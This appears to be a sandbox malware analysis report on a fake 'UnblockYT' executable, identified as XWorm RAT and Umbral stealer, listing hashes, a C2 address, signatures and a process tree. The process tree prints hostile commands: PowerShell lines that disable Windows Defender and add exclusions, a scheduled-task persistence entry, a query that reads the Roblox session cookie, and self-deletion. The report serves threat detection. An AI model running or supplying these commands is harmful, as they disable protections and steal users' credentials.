Analysis

  • max time kernel
    299s
  • max time network
    295s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-08-2024 09:11

General

  • Target

    UnblоckYT .exe

  • Size

    2.2MB

  • MD5

    83bac78ee6a4de7070e73ed20f683b04

  • SHA1

    6fd261a71a20ac9fe3661dee5daf2101f034e282

  • SHA256

    24fd45824aa18ef1766dfd9b2a6e6fd4d46b956be84b243f5904075a7fdb3535

  • SHA512

    cc535de97e30e9ecf28f0ca51a17e8a12d91b98ecd3f99fb7218b4059d69ce8b9dea387938ffc40e018629c6fa78244c1972cf29c36526e85d7fde50a8c2dbae

  • SSDEEP

    49152:1Djlabwz9f38XpWxKyNCNWakvy/+adWUKNwljT+Pb3Qz:Zqw1OWxK6WWakvy35KEoi

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 6 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive profile data.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 10 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
    "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
    1⤵
      PID:4340
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:5072
      • C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe
        "C:\Users\Admin\AppData\Local\Temp\UnblоckYT .exe"
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:680
        • C:\Users\Admin\AppData\Roaming\UnblоckYT .exe
          "C:\Users\Admin\AppData\Roaming\UnblоckYT .exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
            "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3436
            • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
              "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:208
              • C:\Users\Admin\AppData\Roaming\YTunblock.exe
                "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
                5⤵
                • Checks computer location settings
                • Drops startup file
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3464
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4700
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3332
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2696
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2816
                • C:\Users\Admin\AppData\Local\Temp\xitwtr.exe
                  "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe"
                  6⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3812
                  • C:\Windows\SYSTEM32\attrib.exe
                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe"
                    7⤵
                    • Views/modifies file attributes
                    PID:2960
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xitwtr.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4812
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3380
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4584
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:456
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" os get Caption
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1988
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" computersystem get totalphysicalmemory
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3556
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" csproduct get uuid
                    7⤵
                      PID:2252
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4948
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic" path win32_VideoController get name
                      7⤵
                      • Detects videocard installed
                      PID:4152
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\xitwtr.exe" && pause
                      7⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      PID:2888
                      • C:\Windows\system32\PING.EXE
                        ping localhost
                        8⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:228
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4392
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3036
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:5012
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3504
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:880
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:2872
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4068
                • C:\Windows\system32\timeout.exe
                  timeout /t 1 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4132
                • C:\Windows\system32\timeout.exe
                  timeout /t 3 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4388
                • C:\Windows\system32\timeout.exe
                  timeout /t 3 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:1452
                • C:\Windows\system32\timeout.exe
                  timeout /t 2 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3664
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3576
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2660
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2960

        Network

        MITRE ATT&CK Enterprise v15


        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

          Filesize

          522B

          MD5

          8334a471a4b492ece225b471b8ad2fc8

          SHA1

          1cb24640f32d23e8f7800bd0511b7b9c3011d992

          SHA256

          5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

          SHA512

          56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          da0e645754bee5dea8e82cdf88364bfe

          SHA1

          4a92598fb8706a7fdf6d9343704a173807087191

          SHA256

          73a97752534c0ee8b655712e05c4c53127dbcefcf769838b464ce46de7e24068

          SHA512

          c3bfd5fd716888ca04390bdfd34e2a4aa08329bdf0f1c1c65a94dc0a53cfb2c7ea9d2b31cc6863189ca0cc74794dbce5035ad867e171f5051d25b6a87d23e3cb

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          b26ac95363638555ce516e5fd892fd67

          SHA1

          e21c3b09f115383e24c03c2db875c120d8977878

          SHA256

          73b2bd3120d9afade9a02ed07abc960dda68d4cb06319466057302286cf29f95

          SHA512

          b4ef740ecc2c924709f792face4c0215a8d90a89288cee22f087a79a8dd9773af4b2ccfb71ea6cbff6fa5ad919dfbeebbde033d01eb4ddc07b233ea6f7bc2939

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          177dcaab989d9ccaa3d2beff26022dfc

          SHA1

          f95539ce14b0ce5b06225ed2435a3f54885eda03

          SHA256

          8712c6c7188c8b392cbf74187fca562296f9aea56c06447c9e3d79bf2374bc4f

          SHA512

          117229fa8327abb9ef77a95800b8e9e00a5d3e410a8324b2acb7e245f500f6b232448fa54249798add7e3d97f07023ac999f42a006c80a246208fa4a66be15c5

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          3a78acc4ee6e2ac1cb13574f9fc32639

          SHA1

          b7a2eada56461d883d21ec98407f90d5caa03d8c

          SHA256

          ae3951cef55032551c84974ad25ca50e6bc29ac562dfad5b22d6808cd632da6d

          SHA512

          d3d569b10efbb1d7c3aafe2e9c30e5c65a4dc8e98f500fac66ba2cfba5d52bc8791f3332f580f83f75c88672e0a99d2494177b6ddb0867ca997de50b39eddc18

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          9b80cd7a712469a4c45fec564313d9eb

          SHA1

          6125c01bc10d204ca36ad1110afe714678655f2d

          SHA256

          5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

          SHA512

          ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          985b3105d8889886d6fd953575c54e08

          SHA1

          0f9a041240a344d82bac0a180520e7982c15f3cd

          SHA256

          5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

          SHA512

          0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          276798eeb29a49dc6e199768bc9c2e71

          SHA1

          5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

          SHA256

          cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

          SHA512

          0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          79f6952813009f51247491052ca9ebbb

          SHA1

          78210dbe806bcde87a5f00201c9068bc1737a9ca

          SHA256

          bee2da5d5a697d09df4aa2b1c374a083a49b4f319c11da53c43ce9520b72a5dd

          SHA512

          cd019d3dc84665413a23cb2f4ed8fbe6bd6673928144d7af31e70d46dc24ce876bd5ffb11cb65fd5532f8f00bd793dd883200069b06dc93becf5d1db0399c22b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hve4toep.ktv.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\xitwtr.exe

          Filesize

          229KB

          MD5

          fed4a7197948ba327337b612254a673b

          SHA1

          2d1a9070dac7754ec592768654574fb933ec3730

          SHA256

          2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

          SHA512

          51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

          Filesize

          771B

          MD5

          2550399ce21282e2907bb02ec1a805cb

          SHA1

          c217c3c4e269f601800144dc4a8930e3ad338d54

          SHA256

          a6a5e41524327518ee0be6f11c5c7e2d43ccb01130d3bf476bce928e04871f5f

          SHA512

          28555006184873af09abf0c143c56b4fa0f709491a3313be647771bcda5e15525382e6e445217dd4faeb9ece1780844f62e3cbf01a36cd390b3ff8e049fa3f70

        • C:\Users\Admin\AppData\Roaming\UnblockYT .exe

          Filesize

          1.8MB

          MD5

          ddf02dfa6df9ee4e157d675e55a055c7

          SHA1

          d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

          SHA256

          6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

          SHA512

          79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

        • C:\Users\Admin\AppData\Roaming\UnblоckYT .exe

          Filesize

          2.0MB

          MD5

          9507d39a1268cc9bc49a89a5b6b1efde

          SHA1

          62919a92df361ec9f797066b8fd025d7e07c2795

          SHA256

          d815fcc722bee4f1025644dce314ce8c0b41d05491fd1e3c382a3b403564075f

          SHA512

          ffd75d68a7e8025c11922681b3214a8c96d70f7fd30f6eb7f6429e3865113f5406cc33ac76cd1580c03b64a52ff846c2c6e8d75968876ab7ac0625dd4873bbc0

        • C:\Users\Admin\AppData\Roaming\YTunblock.exe

          Filesize

          1.2MB

          MD5

          5c130e0ea8b936a34372663dd763f722

          SHA1

          cbb1efd33b28851682ae3f9699c79ffe705c780d

          SHA256

          262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

          SHA512

          a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

        • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe

          Filesize

          1.6MB

          MD5

          10aefe8560bf4e437d2f47bd469a59ff

          SHA1

          57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

          SHA256

          56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

          SHA512

          d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

        • C:\Users\Admin\AppData\Roaming\ .bat

          Filesize

          1KB

          MD5

          5807f01368bda72ebd943e8755fa2e0c

          SHA1

          f42940149bf0e256b14343c87f750c6cdac8ae72

          SHA256

          9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

          SHA512

          31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

        • memory/2660-186-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2660-181-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2660-182-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2660-183-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2696-156-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

        • memory/2960-295-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2960-297-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/2960-293-0x0000000000050000-0x0000000000402000-memory.dmp

          Filesize

          3.7MB

        • memory/3332-135-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

        • memory/3464-97-0x0000000007AF0000-0x0000000007B0A000-memory.dmp

          Filesize

          104KB

        • memory/3464-74-0x0000000005E30000-0x0000000006184000-memory.dmp

          Filesize

          3.3MB

        • memory/3464-89-0x0000000007470000-0x0000000007513000-memory.dmp

          Filesize

          652KB

        • memory/3464-90-0x0000000007DF0000-0x000000000846A000-memory.dmp

          Filesize

          6.5MB

        • memory/3464-91-0x00000000077B0000-0x00000000077CA000-memory.dmp

          Filesize

          104KB

        • memory/3464-92-0x0000000007820000-0x000000000782A000-memory.dmp

          Filesize

          40KB

        • memory/3464-93-0x0000000007A30000-0x0000000007AC6000-memory.dmp

          Filesize

          600KB

        • memory/3464-94-0x00000000079B0000-0x00000000079C1000-memory.dmp

          Filesize

          68KB

        • memory/3464-95-0x00000000079E0000-0x00000000079EE000-memory.dmp

          Filesize

          56KB

        • memory/3464-96-0x00000000079F0000-0x0000000007A04000-memory.dmp

          Filesize

          80KB

        • memory/3464-78-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

        • memory/3464-98-0x0000000007AD0000-0x0000000007AD8000-memory.dmp

          Filesize

          32KB

        • memory/3464-77-0x0000000006A50000-0x0000000006A82000-memory.dmp

          Filesize

          200KB

        • memory/3464-48-0x0000000002B90000-0x0000000002BC6000-memory.dmp

          Filesize

          216KB

        • memory/3464-76-0x0000000006520000-0x000000000656C000-memory.dmp

          Filesize

          304KB

        • memory/3464-49-0x0000000005660000-0x0000000005C88000-memory.dmp

          Filesize

          6.2MB

        • memory/3464-75-0x0000000006480000-0x000000000649E000-memory.dmp

          Filesize

          120KB

        • memory/3464-50-0x00000000053B0000-0x00000000053D2000-memory.dmp

          Filesize

          136KB

        • memory/3464-51-0x0000000005550000-0x00000000055B6000-memory.dmp

          Filesize

          408KB

        • memory/3464-88-0x0000000007440000-0x000000000745E000-memory.dmp

          Filesize

          120KB

        • memory/3576-54-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-67-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-70-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-68-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-69-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-71-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-72-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-53-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-73-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3576-52-0x000001AB20960000-0x000001AB20961000-memory.dmp

          Filesize

          4KB

        • memory/3812-272-0x0000020A23530000-0x0000020A23542000-memory.dmp

          Filesize

          72KB

        • memory/3812-204-0x0000020A09080000-0x0000020A090C0000-memory.dmp

          Filesize

          256KB

        • memory/3812-234-0x0000020A238C0000-0x0000020A238DE000-memory.dmp

          Filesize

          120KB

        • memory/3812-271-0x0000020A234F0000-0x0000020A234FA000-memory.dmp

          Filesize

          40KB

        • memory/3812-231-0x0000020A237A0000-0x0000020A23816000-memory.dmp

          Filesize

          472KB

        • memory/3812-233-0x0000020A23820000-0x0000020A23870000-memory.dmp

          Filesize

          320KB

        • memory/4700-113-0x000000006F580000-0x000000006F5CC000-memory.dmp

          Filesize

          304KB

        • memory/4700-105-0x0000000005BD0000-0x0000000005F24000-memory.dmp

          Filesize

          3.3MB

        • memory/4812-210-0x0000019067F00000-0x0000019067F22000-memory.dmp

          Filesize

          136KB

        • memory/4972-44-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

        • memory/4972-172-0x0000000007530000-0x0000000007AD4000-memory.dmp

          Filesize

          5.6MB

        • memory/4972-175-0x00000000072B0000-0x00000000072BA000-memory.dmp

          Filesize

          40KB

        • memory/4972-187-0x00000000072D0000-0x00000000072DC000-memory.dmp

          Filesize

          48KB

        • memory/4972-177-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

        • memory/4972-47-0x00000000039E0000-0x0000000003A46000-memory.dmp

          Filesize

          408KB

        • memory/4972-46-0x0000000005C40000-0x0000000005CDC000-memory.dmp

          Filesize

          624KB

        • memory/4972-45-0x0000000000C00000-0x0000000000FB2000-memory.dmp

          Filesize

          3.7MB

        • memory/4972-174-0x0000000007310000-0x00000000073A2000-memory.dmp

          Filesize

          584KB